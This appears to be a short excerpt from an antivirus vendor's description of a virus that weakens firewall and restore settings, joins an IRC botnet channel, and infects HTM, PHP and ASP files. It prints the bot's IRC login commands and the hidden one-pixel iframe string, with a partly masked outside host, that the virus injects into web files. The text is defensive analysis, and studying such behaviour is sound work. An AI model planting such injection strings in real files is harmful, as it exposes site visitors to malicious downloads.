The virus adds the executable file of the host process to the Windows firewall list of trusted applications.
Then it disables the “Restore system files” function.
The virus attempts to contact the following IRC servers:
If a connection is established, the virus sends the following commands to the server:
NICK dewxxpyi USER b JOIN #.<rnd1>, where rnd1 is a random number.
Then the virus enters standby mode, ready to receive commands from the malicious IRC server and execute them.
The virus is capable of executing the following commands:
The virus also scans the victim computer’s hard drive for files with the following extensions:
HTM PHP ASP
If found, it adds the following string into them:
<iframe src=”http://****.pl/rc/” width=1 height=1